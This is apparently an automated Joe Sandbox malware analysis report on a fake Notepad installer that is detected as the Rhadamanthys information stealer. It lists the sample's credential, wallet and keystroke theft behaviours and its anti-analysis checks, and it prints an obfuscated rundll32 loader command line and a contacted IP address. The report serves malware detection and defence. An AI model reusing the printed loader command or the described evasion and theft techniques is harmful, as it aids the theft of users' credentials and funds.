Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Notteppad_SettupX32iX64.exe

Overview

General Information

Sample Name:Notteppad_SettupX32iX64.exe
Analysis ID:783578
MD5:e7dfb892dbd65b0ed6fed69b20edf739
SHA1:1cc4b53dcd7add65fe4b11531751b43f2d7e387d
SHA256:2a4637eeb74d47ddbe7ff10f005806bce77ee877b9ae52f55bf6ae425cc3fcd5
Tags:exeRhadamanthys
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected RHADAMANTHYS Stealer
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contain functionality to detect virtual machines
Contains functionality to detect virtual machines (IN, VMware)
Searches for specific processes (likely to inject)
Found API chain indicative of debugger detection
Tries to harvest and steal Bitcoin Wallet information
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Queries device information via Setup API
Contains functionality to detect virtual machines (STR)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to detect virtual machines (SIDT)
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Contains functionality to read device registry values (via SetupAPI)
PE file contains more sections than normal
Yara detected Keylogger Generic
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)

Classification

Process Tree

  • System is w10x64
  • Notteppad_SettupX32iX64.exe (PID: 5280 cmdline: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe MD5: E7DFB892DBD65B0ED6FED69B20EDF739)
    • rundll32.exe (PID: 5152 cmdline: "C:\Users\user\AppData\Roaming\nsis_uns6283e8.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DWvAEoAUB8AbyMAZv8AcQBtAHUAQc8ATABOJwAtAVlI|4PsKOgEAgAA|0iDxCjDzMzM|0yJRCQYSIlUfyQQSIlMJAhdAf9Ii0QkMEiJBO0kgQE4SG8ACEjHt0QkEC0B6w6BARCvSIPAAY8BEIEBQNtIOZYAcyWfA4sM|yRIA8hIi8FI64tMqwFUewAD0Uj|i8qKCYgI68F+ZgVlSIsEJWDz8P8zyUiLUBhIO||RdDZIg8IgSP+LAkg7wnQqZv+DeEgYdRpMi|9AUGZBgzhrdN0HERFLdQgREHgQ|y50BUiLAOvV10iLSP0AwWoAQFP|VVZXQVRBVUH3VkFXXQFmgTlN|1pNi|hMi|JI34vZD4X88|BMY|9JPEGBPAlQRd8AAA+F6vPwQYv3hAmI8|CFwEiN3zwBD4TWahGDvLsJjC0BD4TH8|BE|4tnIESLXxyL|3ckRItPGEwD|+FMA9lIA|Ezf8lFhckPhKTz8P9Ni8RBixBFM||SSAPTigKEwP90HUHByg0Pvr3A+gABRAPQvxF1|+xBgfqq|A18|3QOg8EBSYPA|wRBO8lzaevG|4vBD7cMTkWL|yyLTAPrdFgzfe2qEHRRQYsUwQD|0zPJigJMi8Jv6w|BycgRA8jlEO8BQYoA1RDtM8A|M|ZBOwy24BCmAP+DxgGD+Ahy7v|rCkiLy0H|1b9JiQT3g8XkEMS|BDtvGHKvZgFB|19BXkFdQVxf915dWzMXSIHsYP0BZACL6ehm|v9||0iFwA+EmHUg60yNrwGLKxDIM||76Jt9II1fBEyN|0VGM9KLy|9U+yRogCBMi+APhPVrdSBFqBAzwIvTvpEgSIl8JCCmIHB+gCBIi|APhEt1IP6mIFBIjVYIRI2|R0BIjYwkhRFI34vY6Hz9fiCNVtVI3iAQ4iHM8|DoZ37vIESLBo1XCEEgeqYgWMohiYQkgIcS7d7z8IsO2iBYiYyxJHERBzCRIOgx7yCL|ZwtMkyLXTpIg|f7bEiKIDBMiWTfJDhMi6QaMkyJ3VyEAYQk3IcRhpJ2jRGNR0swjCTw8|C|SYvU6On8BTCK3Zx4MkiNhHgyQYD|8yGNT2xEMBj+pAKD6QF184G8|ngyIVJleHVNi3eEJPQiMZQk+DUB|8JIO9hyOIP6f2x2M0SNSUD6AE+UQbgAmACmIEDKIs|4dBlEtjDAMUmN91QkbJEgSYPobLvoa4IwSIvOpiB4|0iF|3QSi1VC+UyOMBsxSI1MJEAf|9dIgcR0IWEkLQgALQE= MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 3560 cmdline: C:\Windows\system32\WerFault.exe -u -p 5152 -s 272 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000000.00000003.243662510.00000000007F6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.3.Notteppad_SettupX32iX64.exe.2a20000.2.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:192.168.2.3164.90.172.22449698802043202 01/13/23-05:12:09.288311
              SID:2043202
              Source Port:49698
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:164.90.172.224192.168.2.380496982853001 01/13/23-05:12:09.323085
              SID:2853001
              Source Port:80
              Destination Port:49698
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: Notteppad_SettupX32iX64.exeReversingLabs: Detection: 19%
              Source: Notteppad_SettupX32iX64.exeVirustotal: Detection: 21%Perma Link
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C1C06C CryptUnprotectData,1_2_00007DF4B3C1C06C
              Source: Notteppad_SettupX32iX64.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: Binary string: wkernel32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244881244.0000000002620000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244831412.0000000002504000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248576597.0000000002830000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.248145801.000000000250C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcrt.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245563996.00000000025D0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245469036.000000000250D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245765521.0000000002501000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245844802.00000000025D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273050542.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244109715.0000000002507000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260362834.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.259962474.0000000002508000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.280113547.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249955394.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245986343.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: setupapi.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253433753.000000000283D000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.254291672.0000000002C80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246070776.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245334588.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245378880.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263974980.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245915259.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cfgmgr32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255043550.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.289392390.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shell32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245765521.0000000002501000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245844802.00000000025D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.247163570.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.247436363.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: psapi.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253383026.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.284854081.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246070776.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251663261.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mpr.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255267191.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249955394.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245915259.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: setupapi.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253433753.000000000283D000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.254291672.0000000002C80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.250112415.000000000283E000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.250519069.0000000002AA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: gdi32full.pdb source: rundll32.exe, 00000001.00000003.280972629.0000025AA3B65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.282135570.0000025AA3CFD000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: win32u.pdb source: rundll32.exe, 00000001.00000003.280859396.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248576597.0000000002830000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.248145801.000000000250C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245960559.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.0000000002830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shell32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251663261.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263974980.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: imm32.pdb source: rundll32.exe, 00000001.00000003.283179571.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: gdi32full.pdbUGP source: rundll32.exe, 00000001.00000003.280972629.0000025AA3B65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.282135570.0000025AA3CFD000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246455497.00000000028AC000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.246110906.0000000002585000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: profapi.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263650614.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293014153.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ws2_32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253309097.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253224746.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msctf.pdbUGP source: rundll32.exe, 00000001.00000003.283688801.0000025AA3B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246455497.00000000028AC000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.246110906.0000000002585000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260362834.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.259962474.0000000002508000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.280113547.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mpr.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255267191.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273050542.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244109715.0000000002507000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000001.00000003.269181411.0000025AA3900000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ole32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251971029.0000000002503000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.252817024.0000000002830000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293112471.0000025AA3A1B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdbUGP source: rundll32.exe, 00000001.00000003.293051816.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdb source: rundll32.exe, 00000001.00000003.293051816.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msctf.pdb source: rundll32.exe, 00000001.00000003.283688801.0000025AA3B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.264610622.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260789377.0000000002833000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.262323104.0000000002E00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ole32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251971029.0000000002503000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.252817024.0000000002830000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293112471.0000025AA3A1B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: win32u.pdbGCTL source: rundll32.exe, 00000001.00000003.280859396.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263476814.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.292944490.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdbGCTL source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244881244.0000000002620000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.244831412.0000000002504000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: imm32.pdbUGP source: rundll32.exe, 00000001.00000003.283179571.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263476814.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.292944490.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: psapi.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253383026.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.284854081.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.247163570.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.247436363.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245334588.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.245378880.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245960559.0000000000710000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cfgmgr32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255043550.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.289392390.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253075899.0000000002508000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253137591.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245986343.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.250112415.000000000283E000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.250519069.0000000002AA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260789377.0000000002833000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.262323104.0000000002E00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb source: rundll32.exe, 00000001.00000003.269181411.0000025AA3900000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
              Source: Binary string: profapi.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263650614.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293014153.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.264610622.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253075899.0000000002508000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253137591.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.0000000002830000.00000004.00001000.00020000.00000000.sdmp
